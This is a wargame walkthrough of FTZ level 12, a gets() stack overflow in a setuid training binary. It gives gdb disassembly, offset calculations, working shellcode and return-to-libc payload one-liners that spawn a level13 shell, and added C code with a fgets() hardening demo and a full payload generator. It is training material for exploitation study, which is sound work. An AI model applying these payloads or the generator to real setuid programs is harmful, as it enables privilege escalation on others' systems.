FTZ level 12

c0wb3ll | 2020. 3. 10. 19:22

FTZ level12

Problem

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
    char str[256];

    setreuid( 3093, 3093 );            /* run as level13 (uid 3093) */
    printf( "문장을 입력하세요.\n" );  /* "Enter a sentence." */
    gets( str );                       /* no length check: stack overflow */
    printf( "%s\n", str );
}  

This is the source code of FTZ level12. The task is to find the weakness in it and use it to obtain the password of the next level (level13), whose privileges the binary runs with.


Vulnerability

int main( void )
{
    char str[256];

    // setreuid( 3093, 3093 );
    // printf( "문장을 입력하세요.\n" );
    gets( str );
    // printf( "%s\n", str );
}  
  • Input is read with gets().
  • str is 256 bytes.
  • gets() puts no limit on the length of what it reads.

So if more than 256 bytes are entered, the write runs past the end of str and overwrites whatever sits above it on the stack: the padding, the saved frame pointer, and then the return address.
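As an added illustration (not part of the original post or the attackme binary), the following C program puts the gets() pattern above next to a bounded fgets() replacement and measures what a 300-byte line does to each, using a guard word placed where the saved ebp / return address would be. The frame struct, the 0xdeadbeef guard value and the constructed input lines are assumptions of this example only.

```c
#include <stdio.h>
#include <string.h>

/* A toy frame for the demonstration: a 256-byte str followed by a guard
 * word that stands in for the saved ebp / return address above str in
 * attackme, plus slack so the deliberate overflow stays inside the object. */
struct frame {
    char str[256];
    volatile unsigned int guard;
    char slack[64];
};
#define GUARD_VALUE 0xdeadbeefu

/* What gets() does: copy until newline or EOF with no bound at all. */
static void unsafe_gets(char *s, FILE *in)
{
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *s++ = (char)c;
    *s = '\0';
}

/* Hardened replacement: fgets() bounded by the buffer size. A line longer
 * than size-1 bytes is truncated and the rest of it discarded, so it does
 * not leak into the next read. Returns bytes stored, or -1 on EOF. */
int read_sentence(char *str, size_t size, FILE *in)
{
    if (size == 0 || fgets(str, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(str);
    if (len > 0 && str[len - 1] == '\n') {
        str[--len] = '\0';            /* whole line fit: strip '\n' like gets() */
    } else {
        int c;                        /* line was too long: drain the remainder */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Constructed input: a line of `len` 'A's and a newline, as a stream. */
static FILE *constructed_line(size_t len)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++)
        fputc('A', f);
    fputc('\n', f);
    rewind(f);
    return f;
}

/* Feed the constructed line through either reader and return the guard word
 * afterwards: GUARD_VALUE means the frame survived, 0x41414141 means the
 * bytes above str were overwritten with 'A'. */
unsigned int guard_after_read(size_t len, int use_gets)
{
    struct frame f = {0};
    f.guard = GUARD_VALUE;
    FILE *in = constructed_line(len);
    if (in == NULL)
        return 0;
    if (use_gets)
        unsafe_gets(f.str, in);
    else
        read_sentence(f.str, sizeof f.str, in);
    fclose(in);
    return f.guard;
}

/* Length read_sentence() reports for a line of `len` bytes: never above 255. */
int bounded_length(size_t len)
{
    char str[256];
    FILE *in = constructed_line(len);
    if (in == NULL)
        return -1;
    int n = read_sentence(str, sizeof str, in);
    fclose(in);
    return n;
}

int main(void)
{
    printf("gets(),  300 bytes: guard = 0x%08x\n", guard_after_read(300, 1));
    printf("fgets(), 300 bytes: guard = 0x%08x, stored %d bytes\n",
           guard_after_read(300, 0), bounded_length(300));
    return 0;
}
```

With the unbounded reader the guard comes back as 0x41414141, which is exactly the situation the exploit below relies on; with fgets() it stays intact and the caller learns that the line was truncated at 255 bytes.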


Scenario

From here on I plan to solve these with RTL and with a basic environment-variable BOF, and post both.


Solution (environment variable)

[level12@ftz level12]$ gdb attackme 
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:    push   0xc15
0x08048481 <main+17>:    push   0xc15
0x08048486 <main+22>:    call   0x804835c <setreuid>
0x0804848b <main+27>:    add    esp,0x10
0x0804848e <main+30>:    sub    esp,0xc
0x08048491 <main+33>:    push   0x8048538
0x08048496 <main+38>:    call   0x804834c <printf>
0x0804849b <main+43>:    add    esp,0x10
0x0804849e <main+46>:    sub    esp,0xc
0x080484a1 <main+49>:    lea    eax,[ebp-264]
0x080484a7 <main+55>:    push   eax
0x080484a8 <main+56>:    call   0x804831c <gets>
0x080484ad <main+61>:    add    esp,0x10
0x080484b0 <main+64>:    sub    esp,0x8
0x080484b3 <main+67>:    lea    eax,[ebp-264]
0x080484b9 <main+73>:    push   eax
0x080484ba <main+74>:    push   0x804854c
0x080484bf <main+79>:    call   0x804834c <printf>
0x080484c4 <main+84>:    add    esp,0x10
0x080484c7 <main+87>:    leave  
0x080484c8 <main+88>:    ret    
0x080484c9 <main+89>:    lea    esi,[esi]
0x080484cc <main+92>:    nop    
0x080484cd <main+93>:    nop    
0x080484ce <main+94>:    nop    
0x080484cf <main+95>:    nop    
End of assembler dump.
(gdb) 

gets() writes into the buffer at ebp-264: the 256 bytes of str plus 8 bytes of padding sit below the saved ebp, so the return address is at offset 268 from the start of str.

So after registering the shellcode in an environment variable, overwriting str[256] + dummy[8] + sfp[4] + ret[&shellcode] should do it: 268 bytes of filler, then the address of the shellcode written little-endian.

Exploit code (the trailing cat keeps stdin open so the spawned shell can read the id command):

[level12@ftz level12]$ (python -c "print 'A'*268 + '\x57\xff\xff\xbf'";cat) | ./attackme 
문장을 입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW
id
uid=3093(level13) gid=3092(level12) groups=3092(level12)

Solution (RTL)

The disassembly is the same as in the environment-variable solution above: gets() writes at ebp-264, so the return address is again 268 bytes from the start of str.

Lay the exploit out as str[256] + dummy[8] + sfp[4] + ret[&system()] + 'AAAA' + arg[address of the "/bin/bash" string registered in an environment variable]. When main returns into system(), the stack looks to system() like a normal call: the 4 bytes after its address are its return address (here a dummy 'AAAA', which only matters once the shell exits) and the next 4 bytes are its single argument, the pointer to "/bin/bash".
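As an added example rather than the page's own exploit, the following C generator builds both payloads described on this page (the environment-variable one above and the RTL one here) from the frame offsets read off the disassembly: 264 bytes to the saved ebp, 268 to the return address. It also refuses any address containing a newline byte, since gets() stops reading there. The program name gen, the -e option, the env_address() helper and the scratch buffer payload are assumptions of this example; the addresses in the usage note are the ones the page used.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Offsets recovered from the disassembly: gets() writes at ebp-264, so
 * 264 bytes (256 of str + 8 of padding) reach the saved ebp and 4 more
 * reach the return address. */
#define STR_TO_EBP 264
#define RET_OFFSET (STR_TO_EBP + 4)     /* 268 */
#define MAX_PAYLOAD (RET_OFFSET + 12)

/* Scratch buffer the payload is assembled in. */
unsigned char payload[MAX_PAYLOAD];

/* Write v as four little-endian bytes (x86). Returns 0 if any byte is
 * '\n': gets() stops at a newline, so such an address cannot be delivered
 * through this input path. */
static int put_le32(unsigned char *out, uint32_t v)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(v >> (8 * i));
        if (b == '\n')
            return 0;
        out[i] = b;
    }
    return 1;
}

/* Read a little-endian word back (to inspect a built payload). */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Solution 1: pad up to the return address and point it at the shellcode
 * (its copy inside an exported environment variable). Returns the payload
 * length, or 0 if the address contains a newline byte. */
size_t build_env_payload(unsigned char *out, uint32_t shellcode_addr)
{
    memset(out, 'A', RET_OFFSET);
    if (!put_le32(out + RET_OFFSET, shellcode_addr))
        return 0;
    return RET_OFFSET + 4;
}

/* Solution 2 (return-to-libc): ret -> system(), a fake return address for
 * system() itself, then the address of a "/bin/bash" string as its argument. */
size_t build_rtl_payload(unsigned char *out, uint32_t system_addr,
                         uint32_t fake_ret, uint32_t arg_addr)
{
    memset(out, 'A', RET_OFFSET);
    if (!put_le32(out + RET_OFFSET, system_addr) ||
        !put_le32(out + RET_OFFSET + 4, fake_ret) ||
        !put_le32(out + RET_OFFSET + 8, arg_addr))
        return 0;
    return RET_OFFSET + 12;
}

/* Address of an exported environment variable's value in *this* process
 * (0 if unset). The target's copy sits slightly higher or lower depending
 * on the difference in program-name length, which is why a NOP sled in
 * front of the shellcode is the usual precaution. */
uintptr_t env_address(const char *name)
{
    char *value = getenv(name);
    return value ? (uintptr_t)value : 0;
}

static uint32_t parse_addr(const char *s)
{
    return (uint32_t)strtoul(s, NULL, 0);
}

int main(int argc, char **argv)
{
    size_t n = 0;

    if (argc == 3 && strcmp(argv[1], "-e") == 0) {
        printf("%s is at %p\n", argv[2], (void *)env_address(argv[2]));
        return 0;
    } else if (argc == 2) {
        n = build_env_payload(payload, parse_addr(argv[1]));
    } else if (argc == 4) {
        n = build_rtl_payload(payload, parse_addr(argv[1]),
                              parse_addr(argv[2]), parse_addr(argv[3]));
    } else {
        fprintf(stderr, "usage: %s -e NAME | SHELLCODE_ADDR | SYSTEM_ADDR FAKE_RET ARG_ADDR\n",
                argv[0]);
        return 1;
    }
    if (n == 0) {
        fprintf(stderr, "an address contains a newline byte; gets() would truncate it\n");
        return 1;
    }
    fwrite(payload, 1, n, stdout);
    putchar('\n');     /* terminate the line so gets() returns */
    return 0;
}
```

Compiled as gen, `(./gen 0xbfffff57; cat) | ./attackme` reproduces the environment-variable one-liner and `(./gen 0x4203f2c0 0x41414141 0xbffffe44; cat) | ./attackme` the RTL one (0x41414141 is the 'AAAA' fake return address). `./gen -e SHELLCODE` prints where an exported variable lives in gen's own environment, which is a starting estimate for the target, not an exact value.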

[level12@ftz level12]$ (python -c "print 'A'*268 + '\xc0\xf2\x03\x42' + 'AAAA' + '\x44\xfe\xff\xbf'";cat) | ./attackme 
문장을 입력하세요.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc0\xf2\x03\x42AAAA\x44\xfe\xff\xbf
(the echoed address bytes are shown here as escapes; on the terminal they came out as garbage such as 쟌B and D?)

id
uid=3093(level13) gid=3092(level12) groups=3092(level12)